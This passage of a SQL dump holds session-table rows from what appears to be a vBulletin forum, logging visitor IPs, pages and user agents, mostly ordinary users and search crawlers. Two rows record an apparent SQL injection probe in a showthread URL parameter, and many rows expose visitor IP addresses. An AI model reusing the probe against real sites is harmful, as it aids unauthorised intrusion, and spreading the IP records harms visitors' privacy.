('f91543432ae6c9707d79880b13965fc1', 0, '212.21.66.6', '2b1cb208a3b0567b8480c53a77d48c05', 1466467966, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b75781b9236b63c388459984a83c9a5e', 0, '172.68.29.193', 'cb66c25318e6dd21066dde950f9358aa', 1466471057, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:25.3) Gecko/20150323 Firefox/31.9 PaleMoon/25.3.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e6117c99f2bbccbf338a7c43d52276a9', 0, '172.68.29.201', '2270bd1f5b41d2fa84d95608872ea1a2', 1466471024, '/register.php', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2ecbcde2ff32c31dc7f3d469413fe0a7', 0, '178.73.196.106', 'b891f09de32946215062a9df401d255b', 1466475131, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2a145d8fa7543aac0b79944427fdcd6', 0, '172.68.25.98', '7cad5d849999adce34b929a7c91ff7c7', 1466478146, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3d78917db043d736399b021f445b8e0b', 0, '172.68.11.200', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475253944, '/showthread.php?p=2803', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('72ec79add3e77229efec0b0caf2d5f80', 0, '172.68.11.206', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475239260, '/member.php?u=164', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('677ae95be2caafbf5badb07eace90c2a', 0, '40.77.167.77', 'c5490a5a8e1813ac25cf9e19091dcb85', 1466490701, '/register.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a9827e8843c788b946f65989b7731b6d', 0, '2607:5300:60:25', 'a320653ffdc661be199ffa70b14b72c3', 1466491987, '/showthread.php?p=3045', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2796112d15858b540fc6921c8f704f8', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466494093, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('73a630f5711f467fa0a4719a13b5ef55', 0, '151.238.127.237', '85b5c2c56f3c23186813c1b5a837ea37', 1474238928, '/showthread.php?p=2818', 'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c213af1ddedd2a224111117ecc5bcaa6', 0, '2a02:1810:2e15:', '8f8d622fbee3972700cb58d8f445a7a4', 1466499835, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f28ccbde828aa19e6521e15b87999fbd', 0, '120.72.107.101', '929f3883831fb0f0565ab090f493db1e', 1466500521, '/announcement.php?f=37', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('813bd1cf8e628918b4a410a3966bb5c5', 0, '180.234.211.38', '5c137491d30a7a81436169b92eb61322', 1466501199, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('12143d9442fd99e419cb1dfb4b4d4389', 0, '172.68.34.48', 'a938925ca9403f145c82d10ebc1ecbe1', 1470276749, '/showthread.php?t=2315', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ebb1dc9753703336121baf92d2fb7bd5', 0, '23.92.123.57', '04398ce3d749de016f0e4e4d109713b6', 1466515437, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('34d9b563ff3278041d83dd7e29ee2970', 0, '80.217.65.155', '633a47aa6a386cc55d27a9dd3c504a03', 1466516718, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('365a5936870288fd312421f3dc8c65ed', 0, '2.53.46.24', 'ea1367fe3110e9535ab0577133fcfd74', 1466520360, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('79ead17849718ba7b210c22cd1c64da7', 161, '54.233.145.152', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1466521658, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('e04a6427ec6f55b140ec038e1c5b1bb0', 0, '157.55.39.248', '23f3103f44bc3badcba53554e5e4cb6d', 1466697786, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ef86f307cb6c31f5d6bc6a5e7cefcc1b', 0, '27.74.235.187', '63f854929096072656b2f32a95f5ce79', 1466527632, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('35235397455e5cbb165bc92a9fcd0853', 0, '94.23.77.127', '686ee090200809034f422c86ddae4ced', 1466534249, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b89e324e56b10eb708a680fb82b15d58', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466535144, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('08cdd7c6e1654a5295802c8ee7227cdd', 0, '172.68.11.245', '2ad845d5e298c87a88b9231833183843', 1466537355, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e9c2af51469aac71b0bd9885be11fa6', 0, '2a01:4a0:2e::12', 'cf851808f2eb016481f0b8bd6f240625', 1466539289, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2af52cc1fe26413811c704b1d7aba916', 0, '197.148.120.247', '4f8719cd45d944b4fee24b2681dd9e9f', 1466540953, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('404ba66a2ca86b4b87c95ea53aa879e7', 0, '172.68.10.237', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475338505, '/tweet.php?do=post&id=2970&c=2970', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9f3d2699a14df7168487da211ac5e930', 102, '104.46.33.90', '1f256d4b09290225674bd90243424cc6', 1466546629, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5aad8684f9c68ca2c8c0f433b37e35ef', 0, '37.187.7.74', '96bfec658987372c3647367d44a86619', 1467140111, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d91ee7b73bffb5bc4ba124787cc2fa65', 0, '39.40.208.202', '4cfcb6108af2dc8be1ad5163090a64ab', 1466562114, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa2ef435801e2e326990377c678d9922', 0, '218.17.116.199', '00a2bf8441752edb81269a1d69a622de', 1466565225, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0a6833bf6ee0cdf142e805a30e3f8bd9', 0, '89.176.147.89', '32bef595b89394d9a12d74791531a228', 1466568974, '/showthread.php?p=2688', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('25451ddddc2478962e15eed4a5e753bd', 0, '172.68.11.243', '3b59bb8d35a66dc40e01b8895b26382f', 1466574052, '/showthread.php?p=2956\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cbaf48fa938d1f663dc46f2a48b3fef5', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466576943, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('3a6a9762a75d2f73a9b9e439277d9672', 0, '172.68.34.92', 'dce73380cf0fd3aff82da93d9252bb04', 1466577507, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ac116d4daf6b08dbbf614fb08d811eab', 0, '2a02:598:2::160', 'ec046eb344e2c76ac00fb6e872f2a10e', 1475212746, '/search.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('43992ae5e5e8da839062304d1b2e8869', 0, '172.68.11.246', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475308366, '/showthread.php?p=2878&mode=threaded', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ceabe857541278f55a3fe7a00e692df2', 0, '172.68.11.241', '54fe18c99e79a2671eb7a5764ccbbb4c', 1473615245, '/misc.php?do=whoposted&t=1055', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5acfb88f33e2e46ecbda0778bfa6a930', 0, '141.87.60.153', '1fbe231482e16c79f6d53ee754e415cc', 1466588404, '/search.php?do=getnew', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('69238d7594693eb07bb20bd0b3f48283', 0, '40.77.167.48', 'c5490a5a8e1813ac25cf9e19091dcb85', 1466588872, '/showthread.php?p=3017', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c6b7354a2720e87419e822457556a8fd', 0, '157.55.39.58', '23f3103f44bc3badcba53554e5e4cb6d', 1466617226, '/search.php?searchthreadid=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('04ffa3947bb80091c811602c2dbfbde4', 0, '40.77.167.1', 'c5490a5a8e1813ac25cf9e19091dcb85', 1466588970, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('27faaaef57c87139106bc153a0718337', 0, '172.68.34.90', 'dce73380cf0fd3aff82da93d9252bb04', 1469524284, '/archive/index.php/t-2386.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('5b08ba7bd2a79bf5dcde888b29cc7944', 0, '172.68.10.205', '54fe18c99e79a2671eb7a5764ccbbb4c', 1470805079, '/showthread.php?mode=hybrid&t=1697', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('613ca646a3dcf9f6df432c070cdaa2b4', 0, '209.58.128.169', 'c45abc52d424dddc3d53a73a58c343d4', 1466595820, '/showthread.php?p=2928', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3274d0cd8e10f4dc7f70b5f7d9cf24a2', 0, '172.68.34.81', '8c2a58ed4130be298d50116da95b8cf5', 1466605668, '/showthread.php?p=2264', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1727dab444b2c9291c3a062ccfc618da', 0, '172.68.11.254', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475243505, '/showthread.php?t=2332', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f6c0ce7e1c26723899972b7db5e3d9ac', 0, '172.68.10.249', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471500489, '/showthread.php?mode=hybrid&t=2382', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2ee12ec242e1ea8914a2db240a56b688', 0, '31.13.60.46', '3b3658476475275f61ae0491443d97c4', 1466607637, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('095f3feee0686262c5de415d6b5a241c', 0, '94.25.233.144', 'efaf2c497e24a731bfd1ba8faff62bb4', 1466617874, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('abbac19d428cce7f5dba0ddcdf8101e4', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466619392, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('8a6372f2c19d4d39c9faaacd50cbdd8d', 287, '187.158.110.214', '369cb9e6b147b026b3158434d7fd38c8', 1466619559, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('980e89c8f838736f0af59d7a56703962', 0, '12.229.246.10', 'a527eb811fbe317eef857be0856cfeb0', 1466620253, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f2eb51661ee577d01fbe1ec9ae3193d2', 135, '160.162.38.215', 'a04c8b44a8f2cda84367c83b851a708d', 1466632458, '/index.php?showtopic=8271', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('4c4cbac537b13b5cba6d55737f41dca4', 0, '2a03:2880:3010:', '3965327755710f589a6a534b4473d908', 1466634035, '/index.php?showtopic=8271', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e73f76ec0a67460e69035892fba18e6', 0, '2a03:2880:20:cf', 'fd9c3572087ae24d6414a6b5ce5623bf', 1466634038, '/index.php?showtopic=8271', 'facebookexternalhit/1.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('13e4e836a5be20694c5d523a2de879b6', 0, '189.166.3.104', 'b39ee0e86faa942c52370d40f9c506e3', 1466634497, '/member.php?u=287', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eb1d350805c4563c236666d0341c59a1', 287, '187.158.110.214', '369cb9e6b147b026b3158434d7fd38c8', 1466635649, '/showpost.php?p=3015&postcount=1', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('05fa181df79efe6b5776bea7abf31138', 0, '108.216.94.175', '8c3def426d1cb71aeb879c9fbe538f74', 1466651029, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('35cbe93a8887c35c564010e21df719f4', 0, '105.106.190.92', 'f6ff8615cd57ee6556eed879488a37a3', 1466654487, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b06fde60293a395f7766027c2bbbcfec', 0, '190.103.31.165', 'b561e01dfb7d4e3e97148320690c9e20', 1466659211, '/index.php', 'python-requests/2.10.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cc955ad6d7b9b00373222bb02addf3b2', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466662364, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('cd3024a032af9a796d2a85853b75038a', 0, '157.55.39.111', '23f3103f44bc3badcba53554e5e4cb6d', 1472428501, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7860fd36400f9dd1275a085c0c6d9ca2', 0, '2a02:598:a::79:', 'a55b2971e644feb78c92ac5029f940ad', 1474080462, '/register.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('41bb6907718f4590d59ee9d6410fb133', 0, '81.220.118.129', '6adb92dcd304f0f4138cfb450204203e', 1466685143, '/index.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dba0d305fcef0246d41511bf6db78642', 0, '172.68.11.203', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471323924, '/member.php?u=143', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('81e6730e1000ba7ae626bca2d64997d5', 0, '62.210.14.143', 'e3e803232575588a9d67dbdaf55aaa89', 1466699200, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ac6c3e281eb22d5ece71ef9381fa57a8', 0, '104.160.5.9', 'b3cb9d760ce3a1026da6f9d0702be58b', 1466701890, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ab54d371b9cf1a2f73585b4457bfc6ef', 0, '172.68.10.200', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475235152, '/showthread.php?t=1145', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f6c27b61c9814e7fb655fc1a889b57ad', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466705147, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('52785f259595091e62492d61c9fbcfb1', 0, '2a02:598:2::164', 'c80c5a40de2944496820e124193e5729', 1467796402, '/register.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f7975f97d36393b9b4ee08054ed67d53', 0, '172.68.11.197', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475338785, '/member.php?u=45', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5a97d02b916f4fc06a3b55bfc55e8b2f', 0, '172.68.10.239', '54fe18c99e79a2671eb7a5764ccbbb4c', 1474128518, '/showthread.php?p=2838', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b6bcb18bdfd794f2e540bcd1b891930f', 0, '172.68.10.245', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475312587, '/showthread.php?t=2459', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d0eeb4edb1973c13229b2f31b680f546', 0, '172.68.10.201', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475289072, '/showthread.php?t=2354', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3f876cc33bbc216cb8e607ab8e108b7b', 0, '172.68.10.201', 'dc8cd2a9d86a679686ffa42ce7a50c8c', 1469821849, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6dafda53ac4f6394d95345115350afb7', 0, '212.117.170.192', '1db7b24fccc898b382a3f6e06b5ca00f', 1466723698, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cc326dbd0371efc35971bb0f0b1e12f3', 0, '17.138.56.21', '2d7e7bed8d5729f9c9a5acedff2fc41c', 1466731228, '/archive/index.php', 'Mozilla/5.0 (compatible; Applebot/0.3; +http://www.apple.com/go/applebot)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('a8de965d434cce7dfce92e666599f3a6', 0, '66.249.64.76', 'b74d0bcf4e50a120a01910c89bfe2d08', 1466732205, '/showthread.php?p=2779', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('040c39cfbbe835db62935a1e07a6339b', 0, '2a02:598:a::79:', 'b60447464d056bd0b9839af57da0f34d', 1472658562, '/register.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bcbc164c273174039df8786bde155409', 0, '52.38.192.75', '6f14c9c76180d8de880f7b3101c7aba0', 1466992979, '/showthread.php?p=2956\'A=0', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8154dde3fbd8750031951e0732152744', 0, '157.55.39.215', '23f3103f44bc3badcba53554e5e4cb6d', 1466737563, '/search.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('437cf23380cb4e385fed320d3f878127', 0, '66.249.64.160', 'b74d0bcf4e50a120a01910c89bfe2d08', 1466775905, '/archive/index.php/t-1031.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('83068f18da17f305b7dbd99727c3a395', 0, '66.249.64.183', 'b74d0bcf4e50a120a01910c89bfe2d08', 1466750877, '/archive/index.php/t-2506.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('b7e112a6707e668fe62f081e7aca25e5', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466748196, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c86a5f1ce1b47cd22548d60bd8fa5ff8', 0, '66.249.64.178', 'b74d0bcf4e50a120a01910c89bfe2d08', 1466750878, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa430c3a94a61cacc5e908e5617b3552', 0, '2a02:598:2::105', '0ab31313d475a3908b6c8cf7b76f87de', 1466751717, '/online.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c0440c342dd6d4e503cff73ad7ba94cd', 0, '172.68.34.90', 'a938925ca9403f145c82d10ebc1ecbe1', 1470301914, '/member.php?u=384', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3bc93b8035273f98dfd3aa9476745d5b', 0, '38.145.1.141', 'ae24ae77be1908cd78565d630acc4e3b', 1466753488, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('35a83229a83e871dcbba51d964e2e898', 0, '43.254.33.4', '2d079ab9c3512749302be28f8d349918', 1466756757, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a0c3484208430b095cb7e01e1828bcd9', 0, '103.243.43.139', '4a8d41f7f599a4887c35f617c37df0f7', 1466757689, '/faq.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f8e1f17eeee1afdd8c0fbc5cbdf7a502', 0, '94.41.21.3', 'b0b30f48d2504a21ade2b6428f12ea94', 1466758001, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c5deefe901e9415a62aa911265e027fe', 0, '2601:600:8600:f', 'a3797ece8baa9171920dcb180a054ac7', 1466758098, '/showthread.php?t=1841', 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
